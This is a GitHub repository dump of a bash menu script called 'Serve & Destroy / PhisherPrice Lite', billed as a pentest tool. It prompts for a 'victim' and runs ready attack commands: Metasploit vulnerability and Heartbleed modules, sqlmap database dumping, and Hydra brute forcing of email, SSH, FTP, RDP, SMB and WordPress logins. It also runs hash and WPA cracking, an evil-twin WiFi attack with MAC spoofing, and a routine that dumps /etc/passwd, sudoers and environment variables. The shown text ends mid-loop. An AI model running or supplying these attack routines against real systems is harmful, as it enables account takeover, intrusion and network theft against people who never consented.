├── LICENSE ├── README.md └── snd /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 sircryptic 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # snd 2 | serve and destroy 3 | ### # PhisherPrice Lite 4 | **Multi-Functional Pentest Tool, Command Them All From One Script.** 5 | 6 | 7 | ![snd](https://user-images.githubusercontent.com/48811414/95025042-742dd380-0676-11eb-8a8c-7f692faab7d7.png) 8 | 9 | ![badge](https://user-images.githubusercontent.com/48811414/86191653-8233fb80-bb3f-11ea-8b2c-5e8737da4464.png) ![made-with-bash](https://user-images.githubusercontent.com/48811414/86414182-29896d80-bcbb-11ea-9b0b-de6b57eb583d.png) ![user-friendly](https://user-images.githubusercontent.com/48811414/86414184-2a220400-bcbb-11ea-89a8-89890f2e3775.png) 10 | 11 | ### **- [ x ] How To Install** 12 | 13 | - `git clone https://github.com/sircryptic/snd` 14 | - `cd snd` 15 | - `chmod +x snd` 16 | - `./snd` 17 | 18 | ### **-BUILD VERSION: 1.0.3** 19 | 20 | **-Credits** 21 | 22 | - Sir Crypic 23 | https://github.com/SirCryptic 24 | 25 | 26 | S&D PhisherPrice Lite Version 1.0.3 27 | -------------------------------------------------------------------------------- /snd: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ############################## 3 | ## Serve & Destroy ## 4 | ############################## 5 | ## Created By Sir Cryptic ## 6 | ############################## 7 | ## Developer Sir Cryptic ## 8 | ############################## 9 | ## NULL Security Team ## 10 | ## Greetz Mobly ## 11 | ## Greetz R!ff ## 12 | ############################## 13 | ############################## 14 | ## Developed On ## 15 | ## Kali Linux 2020.2b ## 16 | ## & ## 17 | ## Parrot OS ## 18 | ############################## 19 | i="0" 20 | clear 21 | while [ $i -lt 1 ] 22 | do 23 | clear 24 | 25 | #COLOUR 26 | red='\e[1;31m' 27 | yellow='\e[0;33m' 28 | Blue='\e[1;34m' 29 | Reset='\e[0;0m' 30 | title="S&D" 31 | echo -e '\033]2;'$title'\007' 32 | 33 | echo -e '\e[1;33m 34 | ///, //// 35 | \ /, / >. 36 | \ /, _/ /. 37 | \_ /_/ /. 38 | \__/_ < PhisherPrice Lite 39 | /<<< \_\_ Serve & Demolish 40 | /,)^>>_._ \ Version 1.0.3 [BETA] 41 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 42 | // //``` 43 | ------((`((--------------------\e[0m\e[3;39m 44 | (1) Scanners 45 | (2) Cracking 46 | (3) MSF Payload 47 | (4) OSINT 48 | (5) Other Tools 49 | (i) Information \e[1;33m 50 | ------------------------------- \e[0m\e[3;39m 51 | CTRL + C To Exit \e[1;33m 52 | -------------------------------' 53 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"Main$Blue─"$yellow"Menu$Blue]" 54 | read -p " └─────► " x 55 | option1='1' 56 | option2='2' 57 | option3='3' 58 | option4='4' 59 | option5='5' 60 | info='i' 61 | quit='q' 62 | 63 | if [ "$x" == "$option1" ]; then #Option1 64 | clear 65 | echo -e '\e[1;33m 66 | ///, //// 67 | \ /, / >. 68 | \ /, _/ /. 69 | \_ /_/ /. 70 | \__/_ < PhisherPrice Lite 71 | /<<< \_\_ Serve & Demolish 72 | /,)^>>_._ \ Version 1.0.3 [BETA] 73 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 74 | // //``` 75 | ------((`((--------------------\e[3;31m 76 | Scanners \e[1;33m 77 | ------------------------------- \e[0m\e[3;39m 78 | (1) Metasploit Nmap (w/Vuln Scan) 79 | (2) Nikto Scan (Vuln Scan) 80 | (3) Nmap Scan (w/OS Detection) 81 | (4) SSLyze (Vuln Scan ~ Regular) 82 | (5) Metasploit Heartbleed Scanner 83 | (6) SQL Map 84 | (7) Wapiti3 85 | (8) DirSearch 86 | (9) DNS Recon \e[1;33m 87 | ------------------------------- \e[0m\e[3;39m 88 | CTRL + C To Exit \e[1;33m 89 | ------------------------------- \e[0m\e[3;39m 90 | Press ENTER To Go To Main Menu \e[1;33m 91 | ------------------------------- \e[0m\e[3;39m' 92 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"Scanners$Blue]" 93 | read -p " └─────► " x 94 | submenu1='1' 95 | submenu2='2' 96 | submenu3='3' 97 | submenu4='4' 98 | submenu5='5' 99 | submenu6='6' 100 | submenu7='7' 101 | submenu8='8' 102 | submenu9='9' 103 | 104 | if [ "$x" == "$submenu1" ]; then #submenu-Option-1 105 | clear 106 | echo -e '\e[0;31m-------------------------------\e[1;33m 107 | METASPLOIT VULNERABILITY SCAN 108 | \e[0;31m-------------------------------\e[1;34m' 109 | echo "Victim's IP Or Website:" 110 | echo -e '\e[0;31m-------------------------------' 111 | read -p "~" r 112 | echo -e '\e[0;31m-------------------------------\e[0;39m' 113 | 114 | msfconsole -q -x "nmap -v --script vuln $r ;exit ;" 115 | echo ' ' 116 | echo ' Press ENTER to Main Menu ' 117 | echo ' ' 118 | read 119 | 120 | elif [ "$x" == "$submenu2" ]; then #submenu-Option-2 121 | clear 122 | echo -e '\e[0;31m-------------------------------\e[1;33m 123 | NIKTO VULNERABILITY SCAN 124 | \e[0;31m-------------------------------\e[1;34m' 125 | echo "Victim's IP Or Website:" 126 | echo -e '\e[0;31m-------------------------------' 127 | read -p "~" r 128 | echo -e '\e[0;31m-------------------------------\e[0;39m' 129 | 130 | nikto -Display 1234EP -evasion 1 -Tuning 123bde -host $r 131 | echo ' ' 132 | echo ' Press ENTER to Main Menu ' 133 | echo ' ' 134 | read 135 | 136 | elif [ "$x" == "$submenu3" ]; then #submenu-Option-3 137 | clear 138 | echo -e '\e[0;31m-------------------------------\e[1;33m 139 | NMAP SCAN W/OS DETECTION 140 | \e[0;31m-------------------------------\e[1;34m' 141 | echo "Victim's IP Or Website:" 142 | echo -e '\e[0;31m-------------------------------' 143 | read -p "~" r 144 | echo -e '\e[0;31m-------------------------------\e[0;39m' 145 | sudo nmap -Pn -O $r 146 | echo ' ' 147 | echo ' Press ENTER to Main Menu ' 148 | echo ' ' 149 | read 150 | 151 | 152 | elif [ "$x" == "$submenu4" ]; then #submenu-Option-4 153 | clear 154 | echo -e '\e[0;31m-------------------------------\e[1;33m 155 | SSL VULNERABILITY SCAN 156 | \e[0;31m-------------------------------\e[1;34m' 157 | echo "Victim's IP Or Website:" 158 | echo -e '\e[0;31m-------------------------------' 159 | read -p "~" r 160 | echo -e '\e[0;31m-------------------------------\e[0;39m' 161 | sslyze --regular $r 162 | echo ' ' 163 | echo ' Press ENTER to Main Menu ' 164 | echo ' ' 165 | read 166 | 167 | elif [ "$x" == "$submenu5" ]; then #submenu-Option-5 168 | clear 169 | echo -e '\e[0;31m-------------------------------\e[1;33m 170 | HEARTBLEED VULNERABILITY SCAN 171 | \e[0;31m-------------------------------\e[1;34m' 172 | echo "Victim's IP Or Website:" 173 | echo -e '\e[0;31m-------------------------------' 174 | read -p "~" r 175 | echo -e '\e[0;31m-------------------------------\e[0;39m' 176 | msfconsole -q -x "use auxiliary/scanner/ssl/openssl_heartbleed;set verbose true; set rhosts $r ; exploit ;exit ;" 177 | echo ' ' 178 | echo ' Press ENTER to Main Menu ' 179 | echo ' ' 180 | read 181 | 182 | 183 | elif [ "$x" == "$submenu6" ]; then #submenu-Option-6 184 | clear 185 | echo -e '\e[0;31m-------------------------------\e[1;33m 186 | SQLMAP SCAN 187 | \e[0;31m-------------------------------\e[1;34m' 188 | echo "Victim's IP Or Website:" 189 | echo -e '\e[0;31m-------------------------------' 190 | echo "This Will Audit Database's Automatically" 191 | echo "Using Random User-Agents." 192 | echo "Enter Domain Name Or IP" 193 | read -p "~" sql1 194 | echo "Database Type If You Know It, If Not Leave This Blank" 195 | echo "Press Enter If You're Unsure" 196 | read -p "~" db 197 | echo "Level of tests to perform (1-5, default 1)" 198 | read levelt 199 | echo "Risk of tests to perform (1-3, default 1)" 200 | read -p "~" risksl 201 | echo "SQL injection techniques to use (default : BEUSTQ)" 202 | echo "Press Enter To Leave Default" 203 | read -p "~" techskill 204 | echo -e '\e[0;31m-------------------------------\e[0;39m' 205 | sqlmap --dbms=$db --forms --crawl=2 --level=$levelt --risk=$risksl --random-agent --all --technique=$techskill -u $sql1 206 | echo ' ' 207 | echo ' Press ENTER to Main Menu ' 208 | echo ' ' 209 | read 210 | 211 | elif [ "$x" == "$submenu7" ]; then #submenu-Option-7 212 | clear 213 | echo -e '\e[0;31m-------------------------------\e[1;33m 214 | WAPITI3 VULNERABILITY SCAN 215 | \e[0;31m-------------------------------\e[1;34m' 216 | echo "please choose http or https ?" 217 | echo -e '\e[0;31m-------------------------------' 218 | read -p "~" suredid 219 | echo -e '\e[0;31m-------------------------------\e[1;34m' 220 | echo "Victim's Website:" 221 | echo -e '\e[0;31m-------------------------------' 222 | read -p "~" r 223 | echo -e '\e[0;31m-------------------------------\e[0;39m' 224 | wapiti -u $suredid://$r/ 225 | echo ' ' 226 | echo ' Press ENTER to Main Menu ' 227 | echo ' ' 228 | read 229 | 230 | elif [ "$x" == "$submenu8" ]; then #submenu-Option-8 231 | clear 232 | echo -e '\e[0;31m-------------------------------\e[1;33m 233 | DIRECTORY SEARCH SCAN 234 | \e[0;31m-------------------------------\e[1;34m' 235 | echo "Victim's IP Or Website:" 236 | echo -e '\e[0;31m-------------------------------' 237 | read -p "~" r 238 | echo -e '\e[0;31m-------------------------------\e[0;39m' 239 | cd&&cd dirsearch&&python3 dirsearch.py -u $r -e php,txt,zip,java,js,html,css 240 | echo ' ' 241 | echo ' Press ENTER to Main Menu ' 242 | echo ' ' 243 | read 244 | 245 | elif [ "$x" == "$submenu9" ]; then #submenu-Option-10 246 | clear 247 | echo -e '\e[0;31m-------------------------------\e[1;33m 248 | DNS RECON 249 | \e[0;31m-------------------------------\e[1;34m' 250 | echo "Victim's IP Or Website:" 251 | echo -e '\e[0;31m-------------------------------' 252 | read -p "~" r 253 | echo -e '\e[0;31m-------------------------------\e[0;39m' 254 | dnsrecon -d $r 255 | echo ' ' 256 | echo ' Press ENTER to Main Menu ' 257 | echo ' ' 258 | read 259 | 260 | 261 | else 262 | 263 | n 264 | 265 | 266 | fi 267 | 268 | elif [ "$x" == "$option2" ]; then #Option2 269 | clear 270 | echo -e '\e[1;33m 271 | ///, //// 272 | \ /, / >. 273 | \ /, _/ /. 274 | \_ /_/ /. 275 | \__/_ < PhisherPrice Lite 276 | /<<< \_\_ Serve & Demolish 277 | /,)^>>_._ \ Version 1.0.3 [BETA] 278 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 279 | // //``` 280 | ------((`((--------------------\e[3;31m 281 | Cracking / Brute Force \e[1;33m 282 | ------------------------------- \e[0m\e[3;39m 283 | (1) Auto-Brute (Hydra) 284 | (2) John-The-Ripper 285 | (3) Hash-Identifier 286 | (4) Hashcat 287 | (5) Aircrack-ng (Crack Wifi Pass) 288 | (6) Start sqldict 289 | (7) Wifi Honey Pot Cracker 290 | (8) Just Dump It 291 | (9) Show Users Without A Password \e[1;33m 292 | ------------------------------- \e[0m\e[3;39m 293 | CTRL + C To Exit \e[1;33m 294 | ------------------------------- \e[0m\e[3;39m 295 | Press ENTER To Go To Main Menu \e[1;33m 296 | ------------------------------- \e[0m\e[3;39m' 297 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"Cracking$Blue]" 298 | read -p " └─────► " x 299 | 300 | subf='1' 301 | subg='2' 302 | subh='3' 303 | subi='4' 304 | subj='5' 305 | subk='6' 306 | honeywhy='7' 307 | dumpitall='8' 308 | nopass='9' 309 | 310 | if [ "$x" == "$subf" ]; then #Sub-Option-f 311 | clear 312 | echo -e '\e[1;33m 313 | ///, //// 314 | \ /, / >. 315 | \ /, _/ /. 316 | \_ /_/ /. 317 | \__/_ < PhisherPrice Lite 318 | /<<< \_\_ Serve & Demolish 319 | /,)^>>_._ \ Version 1.0.3 [BETA] 320 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 321 | // //``` 322 | ------((`((--------------------\e[3;31m 323 | Hydra Auto-Brute \e[1;33m 324 | ------------------------------- \e[0m\e[3;39m 325 | (1) Email Crack (SMTP) 326 | (2) SNMP Brute Force 327 | (3) FTP Brute Force 328 | (4) SSH Brute Force 329 | (5) SSH Brute Force (port 22) 330 | (6) POP3 Brute Force 331 | (7) HTTP 401 Brute Force 332 | (8) Windows RDP Brute Force 333 | (9) SMB Brute Force 334 | (10) WP AUTO BRUTE \e[1;33m 335 | ------------------------------- \e[0m\e[3;39m 336 | CTRL + C To Exit \e[1;33m 337 | ------------------------------- \e[0m\e[3;39m 338 | Press ENTER To Go To Main Menu \e[1;33m 339 | ------------------------------- \e[0m\e[3;39m' 340 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"Hydra$Blue]" 341 | read -p " └─────► " x 342 | 343 | hynull1='1' 344 | hynull2='2' 345 | hynull3='3' 346 | hynull4='4' 347 | hynull5='5' 348 | hynull6='6' 349 | hynull7='7' 350 | hynull8='8' 351 | newoption1='9' 352 | HYDRAWPAUTOBRUTE='10' 353 | 354 | if [ "$x" == "$hynull1" ]; then #hynull-Option-1 355 | clear 356 | echo -e '\e[1;33m 357 | Email Crack\e[1;34m 358 | ' 359 | echo "Simple Email Cracking Script Using Hydra." 360 | echo "Written By: NULLSec" 361 | echo "NOTE: Make sure you have wordlists!" 362 | echo "Let us Begin:" 363 | echo "Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:" 364 | read smtp 365 | echo "Enter Email Address:" 366 | read email 367 | echo "Provide Directory of Wordlist for Passwords:" 368 | read wordlist 369 | clear 370 | 371 | hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp 372 | 373 | read 374 | 375 | elif [ "$x" == "$hynull2" ]; then #hynull-Option-2 376 | clear 377 | echo -e '\e[1;33m 378 | SNMP Brute Force \e[1;34m 379 | ' 380 | echo "Enter The Password List Location" 381 | read hydrasnmppass 382 | echo "Enter The Host IP Address of SNMP Server" 383 | read hydraip 384 | 385 | hydra -P $hydrasnmppass -v $hydraip snmp 386 | 387 | read 388 | 389 | elif [ "$x" == "$hynull3" ]; then #hynull-Option-3 390 | clear 391 | echo -e '\e[1;33m 392 | FTP Brute Force\e[1;34m 393 | ' 394 | echo "Enter Known User" 395 | read hydrauser1 396 | echo "Enter The Password List Location:" 397 | read hydrapasslist1 398 | echo "Enter The IP Address" 399 | read hydraip1 400 | 401 | hydra -t 1 -l $hydrauser1 -P $hydrapasslist1 -vV $hydraip1 ftp 402 | 403 | read 404 | 405 | elif [ "$x" == "$hynull4" ]; then #hynull-Option-4 406 | clear 407 | echo -e '\e[1;33m 408 | SSH Brute Force \e[1;34m 409 | ' 410 | echo "Enter Your User List Location" 411 | read hydrauser2 412 | echo "Enter The Password List Location:" 413 | read hydrapasslist2 414 | echo "Enter The IP Address" 415 | read hydraip2 416 | 417 | hydra -v -V -u -L $hydrauser2 -P $hydrapasslist2 -t 1 -u $hydraip2 ssh 418 | 419 | read 420 | 421 | elif [ "$x" == "$hynull5" ]; then #hynull-Option-5 422 | clear 423 | echo -e '\e[1;33m 424 | SSH Brute Force P22\e[1;34m 425 | ' 426 | echo "Enter Your Known User" 427 | read hydrauser3 428 | echo "Enter The Password List Location:" 429 | read hydrapasslist3 430 | echo "Enter The IP Address" 431 | read hydraip3 432 | 433 | hydra $hydraip3 -s 22 ssh -l $hydrauser3 -P $hydrapasslist3 434 | 435 | read 436 | 437 | elif [ "$x" == "$HYDRAWPAUTOBRUTE" ]; then #hynull-Option-9 438 | clear 439 | echo "Hydra WP Auto Brute" 440 | echo "Url (ex:target.com) : http://" 441 | read url 442 | echo "Path (ex:/wp-login.php) : " 443 | read path 444 | echo "User (ex:admin or /path/wordlist.txt) : " 445 | read user 446 | echo "Pass (ex:12345 or /path/wordlist.txt) : " 447 | read pass 448 | echo "Bad Login (ex:wrong) : " 449 | read bad 450 | echo "Parameter (ex:username=^USER^&password=^PASS^) : " 451 | read parameter 452 | sleep 1 453 | echo "[+] Execute : http://$url/$path" 454 | sleep 0.5 455 | echo "[+] User : $user" 456 | sleep 0.5 457 | echo "[+] Pass : $pass" 458 | sleep 0.5 459 | echo "[+] Bad Login : $bad" 460 | sleep 0.5 461 | echo "[+] Parameter : $parameter" 462 | sleep 0.5 463 | hydra -I $url http-post-form $path:$parameter:$bad -l $user -P $pass 464 | 465 | read 466 | 467 | elif [ "$x" == "$hynull6" ]; then #hynull-Option-6 468 | clear 469 | echo -e '\e[1;33m 470 | POP3 Brute Force \e[1;34m 471 | ' 472 | echo "Enter Your Known User Or UserList" 473 | read hydrauser4 474 | echo "Enter The Password List Location:" 475 | read hydrapasslist4 476 | echo "Enter The IP Address" 477 | read hydraip4 478 | 479 | 480 | hydra -l $hydrauser4 -P $hydrapasslist4 -f $hydraip4 pop3 -V 481 | 482 | read 483 | 484 | elif [ "$x" == "$hynull7" ]; then #hynull-Option-7 485 | clear 486 | echo -e '\e[1;33m 487 | 401 Brute Force \e[1;34m 488 | ' 489 | echo "Enter Your Known User Or UserList" 490 | read hydrauser5 491 | echo "Enter The Password List Location:" 492 | read hydrapasslist5 493 | echo "Enter The IP Address" 494 | read hydraip5 495 | echo "enter the 401 Login" 496 | read hyhost 497 | 498 | hydra -L $hydrauser5 -P $hydrapasslist5 $hydraip5 http-get /$hyhost 499 | 500 | read 501 | 502 | elif [ "$x" == "$hynull8" ]; then #hynull-Option-8 503 | clear 504 | echo -e '\e[1;33m 505 | RDP Brute Force \e[1;34m 506 | ' 507 | echo "Enter Your Known User Or UserList" 508 | read hydrauser8 509 | echo "Enter The Password List Location:" 510 | read hydrapasslist8 511 | echo "Enter The IP Address" 512 | read hydraip8 513 | 514 | hydra -t 1 -V -f -l $hydrauser8 -P $hydrapasslist8 rdp://$hydraip8 515 | 516 | read 517 | 518 | elif [ "$x" == "$newoption1" ]; then #hynull-Option-9 519 | clear 520 | echo -e '\e[1;33m 521 | SMB Brute Force \e[1;34m 522 | ' 523 | echo "Enter Your Known User Or UserList" 524 | read hydrauser9 525 | echo "Enter The Password List Location:" 526 | read hydrapasslist9 527 | echo "Enter The IP Address" 528 | read hydraip9 529 | 530 | 531 | hydra -t 1 -V -f -l $hydrauser9 -P $hydrapasslist9 $hydraip9 smb 532 | 533 | read 534 | 535 | else 536 | 537 | n 538 | 539 | 540 | fi 541 | 542 | elif [ "$x" == "$subg" ]; then #Sub-Option-g 543 | echo "enter your wordlist eg :/usr/share/john/password.lst" 544 | read jwords 545 | echo "Enter File Location eg: /usr/john/Documents/unshadowed.txt" 546 | read $jfiles 547 | echo -e ' 548 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 549 | !!!!Gathering Information About Host!!!! 550 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 551 | ' 552 | 553 | john --wordlist=$jwords --rules $jfiles 554 | 555 | read 556 | 557 | elif [ "$x" == "$subh" ]; then #Sub-Option-h 558 | clear 559 | echo -e ' 560 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 561 | !!!!! CTRL + C TO QUIT !!!!! 562 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 563 | 564 | ' 565 | hash-identifier 566 | 567 | echo -e ' 568 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 569 | !!! Good Bye !!! 570 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 571 | 572 | ' 573 | 574 | read 575 | 576 | elif [ "$x" == "$subi" ]; then #Sub-Option-i 577 | clear 578 | echo -e '\e[1;33m 579 | HASHCAT\e[1;34m 580 | ' 581 | echo "Enter Hash Type: 500 = md5crypt" 582 | read encmode 583 | echo "Enter Hash Hocation eg: /usr/share/me/example500.hash" 584 | read hashtype 585 | echo "Enter Wordlist Location eg: /usr/share/wordlists/sqlmap.txt" 586 | read hashpass1 587 | clear 588 | echo -e ' 589 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 590 | !!! Attempting to Crack Hash Type !!! 591 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 592 | 593 | ' 594 | 595 | hashcat -m $encmode $hashtype $hashpass1 596 | 597 | read 598 | 599 | elif [ "$x" == "$subj" ]; then #Sub-Option-j 600 | clear 601 | echo -e '\e[1;33m 602 | AIRCRACK-NG \e[1;34m 603 | ' 604 | echo "Enter Password List Location" 605 | read wifirip 606 | echo "Enter filename.cap location" 607 | read subopi 608 | echo -e ' 609 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 610 | !!!!! Attempting to Crack WPA !!!!! 611 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 612 | 613 | ' 614 | 615 | aircrack-ng -w $wifirip $subopi 616 | 617 | echo -e ' 618 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 619 | !!! DID WE DO IT ? !!! 620 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 621 | 622 | ' 623 | 624 | read 625 | 626 | elif [ "$x" == "$subk" ]; then #Sub-Option-k 627 | clear 628 | echo -e ' 629 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 630 | !!! Launching SQLdict !!! 631 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 632 | 633 | ' 634 | 635 | sqldict 636 | 637 | read 638 | 639 | elif [ "$x" == "$honeywhy" ]; then #hynull-Option-9 640 | clear 641 | # Get user dictionary 642 | echo -n "Enter the directory along with the wordlist name and extension" 643 | read dictpass 644 | # Get wireless interface 645 | echo -n "Enter wireless interface (e.g. wlan1 or wlan0): " 646 | read iface 647 | 648 | # Put wireless interface into monitor mode 649 | echo "Putting wireless interface into monitor mode..." 650 | ip link set dev $iface down 651 | macchanger -r $iface 652 | ip link set dev $iface up 653 | airmon-ng start $iface 654 | 655 | # Get target ESSID and channel 656 | echo -n "Enter target ESSID: " 657 | read essid 658 | echo -n "Enter target channel: " 659 | read ch 660 | 661 | # Create four fake access points 662 | echo "Creating four fake access points with name $essid..." 663 | xterm -hold -e "airbase-ng --essid $essid -a aa:aa:aa:aa:aa:aa -c $ch mon0" & 664 | pid1=$! 665 | xterm -hold -e "airbase-ng --essid $essid -a bb:bb:bb:bb:bb:bb -c $ch mon0 -W 1" & 666 | pid2=$! 667 | xterm -hold -e "airbase-ng --essid $essid -a cc:cc:cc:cc:cc:cc -c $ch mon0 -W 1 -z 2" & 668 | pid3=$! 669 | xterm -hold -e "airbase-ng --essid $essid -a dd:dd:dd:dd:dd:dd -c $ch mon0 -W 1 -Z 4" & 670 | pid4=$! 671 | 672 | # Capture and save handshake 673 | echo -n "Enter a name for the output file: " 674 | read fname 675 | xterm -hold -e "airodump-ng --channel $ch --write $fname mon0" & 676 | pid5=$! 677 | 678 | # Attempt to crack the password 679 | echo "Attempting to crack password using a strong dictionary..." 680 | aircrack-ng -w $dictpass $fname-01.cap 681 | 682 | # Cleanup 683 | echo "Cleaning up..." 684 | kill $pid1 $pid2 $pid3 $pid4 $pid5 685 | airmon-ng stop mon0 686 | read 687 | 688 | elif [ "$x" == "$dumpitall" ]; then #hynull-Option-9 689 | # A modified version of Gary Hooks' work sys_info.sh: 690 | # Original Author: Gary Hooks 691 | # Web: http://www.twintel.co.uk 692 | # Supporting input from: 693 | # MYero 694 | # JGuz 695 | # SANDFLY SECURITY Linux Compromise Assessment Cmd Cheat Sheet 696 | # Publish Date: 13th May 2020 697 | # Version: 1.2 698 | # Licence: GNU GPL 699 | 700 | current_time=$(date "+%Y.%m.%d-%H.%M.%S") 701 | folderName="${current_time}_Linux_Data_Dump" 702 | mkdir "$folderName" 703 | OutputFileName="${current_time}_Linux_Data_Dump.rtf" 704 | DEL_RUNNING="\b\b\b\b\b\b\b\b" 705 | CLEAR_EOL=$(tput el) 706 | 707 | # First Param: System Name 708 | # Second Param: String describing the overall contents of the file 709 | # Example Useage: insertHeader "MaxEdge" "Passwords in clear text" 710 | function insertHeader() 711 | { 712 | printf "########################################################################\n" | tee -a $CURRENT_FILE 713 | printf "### Linux Data Dump ###\n" | tee -a $CURRENT_FILE 714 | printf "### $1 ###\n" | tee -a $CURRENT_FILE 715 | printf "### $2 ###\n" | tee -a $CURRENT_FILE 716 | printf "########################################################################\n\n" | tee -a $CURRENT_FILE 717 | } 718 | 719 | # First Param: Subsection title 720 | # Example usage: insertPartition "ARP Tables" 721 | function insertPartition() 722 | { 723 | printf -- "\n----------------------------$1----------------------------------------\n" | tee -a $CURRENT_FILE 724 | } 725 | 726 | # First Param: String with Descriptive Title 727 | # Second Param: String with actual command 728 | # Example Usage: runTest "List of Files in Current Folder" "ls -lah" 729 | 730 | function runTest() 731 | { 732 | NAME_OF_TEST=$1 733 | COMMAND_TO_RUN=$2 734 | printf "$1 - Running" 735 | insertPartition $1 736 | printf "($2)\n" >> $CURRENT_FILE 737 | eval $2 >> $CURRENT_FILE 738 | printf "\n\n" >> $CURRENT_FILE 739 | printf "$DEL_RUNNING Saved$CLEAR_EOL\n" 740 | } 741 | 742 | echo "Project Name: " 743 | read projectName 744 | 745 | ##++++++++++++++++ System Data.rtf+++++++++++++++++++++++ 746 | CURRENT_FILE=$folderName/system_data.rtf 747 | touch $CURRENT_FILE 748 | insertHeader $projectName "General_Information" 749 | runTest "Host_Name" "hostname" 750 | runTest "Host_IP" "hostname -I" 751 | runTest "Domain_Name" "domainname" 752 | runTest "Connectivity_Check" "ping -c 4 8.8.8.8" 753 | runTest "Who_Am_I" "whoami" 754 | runTest "Uptime" "uptime" 755 | runTest "System_Name_&_Version" "uname -a" 756 | COMMAND_STRING='lsb_release -a 2>/dev/null | grep -E "Distributor|Description|Release"' 757 | insertPartition "Distributer,_Description,_Release" 758 | printf "($COMMAND_STRING)\n" >> $CURRENT_FILE 759 | eval $COMMAND_STRING >> $CURRENT_FILE 760 | printf "\n\n" >> $CURRENT_FILE 761 | runTest "Logged_In_Users" "who -a" 762 | #Last Logins list length; Full List: last -a; 763 | runTest "Last_10_Logins" "last -a | head -10" 764 | runTest "Currently_Connected" "w" 765 | runTest "List_User_Accounts" "cat /etc/passwd" 766 | runTest "List_Sudoers_File" "cat /etc/sudoers" 767 | runTest "Available_Shells" "cat /etc/shells | tail -n +2" 768 | runTest "Environment_Variables" "env" 769 | 770 | 771 | ##++++++++++++++++ Memory Data.rtf+++++++++++++++++++++++ 772 | CURRENT_FILE=$folderName/memory_data.rtf 773 | touch $CURRENT_FILE 774 | insertHeader $projectName "Storage_&_Memory_Data" 775 | runTest "Block_&_Storage_Devices" "lsblk -a" 776 | runTest "Find_Mounted_Filesystems" "findmnt -A" 777 | runTest "File_System_&_Partitions" "df -h" 778 | runTest "Ram_Info" "free -m" 779 | runTest "Memory_Info" "cat /proc/meminfo" 780 | runTest "Find_Hiden_Directories" 'find / -type d -name".*"' 781 | 782 | ##++++++++++++++++ Network Data.rtf+++++++++++++++++++++++ 783 | CURRENT_FILE=$folderName/network_data.rtf 784 | touch $CURRENT_FILE 785 | insertHeader $projectName "Network_Info" 786 | runTest "Host_Name" "hostname" 787 | runTest "Domain_Name" "domainname" 788 | runTest "Connectivity_Check" "ping -c 4 8.8.8.8" 789 | runTest "Interface_Information(IFCONFIG)" "ifconfig -a" 790 | runTest "Interface_Information(IP)" "ip address" 791 | runTest "Routing_Table" "route -n" 792 | runTest "IP_Tables" "iptables -t nat -vnL" 793 | runTest "ARP_Table" "arp -a" 794 | runTest "Net_Stat_(all)" "netstat -a" 795 | runTest "Net_Stat_(Listening)" "netstat -lapn" 796 | runTest "Listening_Ports" "ss -lntu" 797 | runTest "Current_Connections" "ss -s" 798 | runTest "Resolve_Conf" "cat /etc/resolv.conf" 799 | ###runTest "Firewall_Rules" "firewall-cmd --list-all" 800 | runTest "UFW_Firewall_Rules_Verbose" "ufw status verbose" 801 | runTest "UFW_Firewall_Rules_Numbered" "ufw status numbered" 802 | 803 | ##++++++++++++++++ Hardware Data.rtf+++++++++++++++++++++++ 804 | CURRENT_FILE=$folderName/hardware_data.rtf 805 | touch $CURRENT_FILE 806 | insertHeader $projectName "Hardware_Info" 807 | runTest "CPU_Info" "lscpu" 808 | insertPartition "Device_List" 809 | row_count=$(lspci | wc -l) 810 | for (( c=1; c<=${row_count}; c++ )) 811 | do 812 | lspci| sed "${c}q;d" 